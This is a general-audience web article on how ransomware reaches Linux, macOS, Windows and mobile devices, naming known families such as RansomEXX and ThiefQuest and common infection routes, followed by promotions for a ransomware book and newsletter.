Search
Close this search box.

Ransomware by Operating System

How does ransomware affect different operating systems? Linux, macOS, Android, Windows, etc.?

How Does Ransomware Affect Different Operating Systems?

Because a successful infection has such potential to be lucrative, no modern operating system is immune to the threat of ransomware. With the cost of ransomware expected to be $265 billion globally by 2031, it’s essential to know how ransomware affects different operating systems so you can take steps to protect yourself.

Ransomware on Linux

Linux and Unix operating systems are widely used for public web servers as well as for the internal servers that run government and corporate networks. As a result, ransomware on Linux has the potential to affect many high-value targets.
Desktop computers running Linux can …
… can become infected with ransomware the same way that desktops running macOS or Windows get infected: primarily through email or corrupted websites. Servers running Linux can be vulnerable because of inexperienced or untrained system administrators, unpatched software, stolen credentials, and misconfiguration.
Whether on a server or desktop, computers running Linux tend to be less automated than macOS or Windows. Linux is multi-user, and it’s common for a single Linux server to have hundreds of user accounts. Each account must be correctly configured for the operating system to be secure.
Because of the complexity of administration and the need for frequent patches …
… to the thousands of software packages that make up a Linux distribution, the most common entry point for ransomware on Linux is through an unpatched package or misconfigured permissions. Web servers running out-of-date versions of popular content management or blogging tools such as Drupal or WordPress can also be exploited to install and spread ransomware.
Although Linux isolates user accounts …
… ransomware may possess privilege escalation capabilities, which can allow it to access and encrypt data across the entire operating system or the entire network.
The open source and free software ethos that produced Linux means that sys admins typically share information about new ransomware. But this openness has also directly contributed to one of the worst ransomware attacks on the operating system. In August 2015, a security group published ransomware code, specifying that it was for educational purposes only. It didn’t take long, however, for criminals to ignore this warning. Ransomware based on the open source “Hidden Tear” code infected more than 600 servers worldwide.
One of the most common ransomware attacks on Linux systems is RansomEXX (also known as Defrat777). The list of high-profile RansomEXX attacks includes the Brazilian government, the Texas Department of Transportation, and Konica Minolta.

Ransomware on macOS

The first ransomware—known as KeRanger—on macOS appeared in 2016 (back when the operating system was still called OS X). Today, ransomware on macOS is a serious and growing problem.

This is despite the common belief that the macOS is less vulnerable to infection than Windows or Linux. While it may be true that Apple’s control over every aspect of its hardware and operating systems may make the macOS inherently more secure, the relative lack of malware and ransomware on macOS to date can largely be attributed to the much smaller market share of macOS vs. Windows PCs.

With macOS representing less than 20% of the market (vs. 75% for Windows), a ransomware attack against macOS is simply less likely to be as profitable. As a result, fewer ransomware software packages have been developed and discovered that are macOS-specific.

Most ransomware on macOS to date has resulted from users installing pirated software that’s been modified to covertly install the malicious software. ThiefQuest (also known as EvilQuest), first detected on macOS in summer of 2020, was packaged with pirated versions of popular software, including the Little Snitch security software, Mixed In Key DJ software, and the music production software Ableton. ThiefQuest includes both spyware and ransomware.

Besides showing the user a ransom note that demands payment, it also logs the user’s keystrokes, searches the infected host for passwords and cryptocurrency wallet data, and gives the attackers a back door to the host computer.

Malware has also been found in macOS Xcode developer tools. For example, XcodeSpy disguises itself as Xcode’s Run Script functionality. When unknowingly run by a developer building their own software project, it installs a back door on the computer that can be used for command and control of the operating system.

What makes this flavor of malware so dangerous is that it can execute what’s known as a “supply chain attack” by spreading through shared projects in public code repositories and potentially infecting every software application that uses the shared code.

So, if you think you’re safe from ransomware simply because you use a device running macOS, think again.

Ransomware on Windows

Ransomware on Windows PCs represents 91% of all ransomware reported by managed service providers (MSPs), according to data from Statista.com. The leading causes of being infected by ransomware on Windows PCs is through phishing emails that trick users into opening attachments containing malicious code.
But ransomware can also get onto your …
… Windows PC without you even having to open a file. “Drive-by downloading” happens when a user visits an infected website, and that website installs malware without the user’s knowledge.
As with ransomware on macOS and Linux, naïve or poorly trained users are the most common vector for infections that, once installed, can spread far beyond the host that was initially infected.
Malware authors can exploit …
… several features of Windows to install ransomware on Windows PCs. Windows Scripting Host (WSH), used for automating tasks, is one such feature. The ability for users to log into their Windows PC as administrators by default is also a common cause of ransomware on a Windows PC.
A Windows administrator account is …
… at greater risk of ransomware infection because the user can unknowingly run malware with administrator privileges on their machine. If a user is also a domain administrator on a network, they can run a malicious script with full access to the entire network.
Another feature that’s commonly exploited by ransomware authors is the fact that Windows hides file extensions by default. This allows a potentially harmful executable (.exe) file to disguise itself as a less suspicious-looking file type by appending another file extension to the filename, like README.txt.exe.

Ransomware on Mobile Devices

With more business and personal computing being done on our phones than ever, ransomware on mobile devices is also increasing in frequency.


Unlike with desktop computers, however, most ransomware on Android and iOS doesn’t block access to files by encrypting them, but rather makes the entire mobile device unusable.


This type of ransomware is known as locker ransomware, or screenlockers. For example, the AndroidOS/MalLacker.B ransomware, once activated, displays a screen containing a ransom note over every other window.


Much ransomware on mobile devices is fake. A website or app may display a notification demanding payment, but the attackers have no ability to encrypt or disable the device. Clearing the browser cache and history usually returns the device to normal operation.


App stores provide a level of security on mobile operating systems that isn’t available on desktop and server operating systems. Apple has strict approval processes and security checks for apps, and only allows iOS apps downloaded from its app store to be installed.


Android gives users the ability to allow apps to be installed from any source. As a result, ransomware on Android is much commonly spread through fake apps downloaded from third-party sites. One such example is the Kolar ransomware, which was disguised as an adult-themed app, which, when installed, gains control of the device and presents the user with a ransom demand.


Jailbreaking (on iOS) or rooting (on Android) is the process of modifying the operating system to allow the user to have administrator access. Once jailbroken or rooted, the user can install any third-party apps, which makes it much easier for ransomware to infect iOS, in particular.

Get Your Copy of Ransomware:
Understand. Prevent. Recover

It’s the ransomware resource you can’t afford to be without. 437 Pages of ransomware know-how. Stay ahead of the cybercriminals: get your copy now!

Ransomware-2E_Book-cover-mockup-left

Download The Free 313 Page Book: Ransomware Understand. Prevent. Recover

Download The "How To Recover From Ransomware" Cheat Sheet

Grab this free PDF resource on how to prevent Ransomware

Share This Resource With Others

Embed The “How To Recover a From Ransomware Attack” resource on your site or blog using this code.

Get More Ransomware Tools Directly In Your Inbox

Sign Up To Receive Our Monthly Ransomware Newsletter
Don’t worry, we hate spam too

Is This Your Business?
Get In Touch

Contact Us To Sponsor Your Business Listing & Learn More About The Benfits.

Before You Go!
Sign up to stay up to date with everything ransomware

Sign Up To Receive Our Monthly Ransomware Newsletter
Don’t worry, we hate spam too

JUST RELEASED: The 2024 State of Ransomware Survey is in.

A REVEALING REPORT FOR IT PROFESSIONALS BY IT PROFESSIONALS

Free Download Now &
Stay Ahead In Future

Sign Up To Receive Our Monthly Ransomware Newsletter
Don’t worry, we hate spam too
Share via
Copy link
Powered by Social Snap